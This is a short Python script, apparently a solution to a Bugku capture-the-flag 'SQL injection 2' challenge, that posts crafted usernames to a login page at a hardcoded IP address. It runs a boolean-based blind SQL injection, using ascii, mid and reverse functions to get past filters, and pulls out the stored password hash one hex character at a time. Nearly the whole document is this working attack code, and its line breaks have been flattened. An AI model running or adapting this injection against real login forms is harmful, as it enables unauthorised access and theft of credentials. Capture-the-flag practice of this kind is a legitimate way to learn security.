sql注2bugku脚本

import requests,re post_url='http://123.206.87.240:8007/web2/login.php' s = requests.session() asc=[48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102] flag='b' passwd='d' for i in range(1,33): for j in asc: uname="admin'-(ascii(mid(REVERSE(MID((passwd)from(-"+str(i)+")))from(-1)))="+str(j)+")-'" m=s.post(post_url,data={'uname':uname,'passwd':passwd}) m.encoding='utf-8' post_con=m.text print(post_con) if "username error!!@_@" in post_con: print(j) print(chr(j)) flag=flag+chr(j) print(flag) break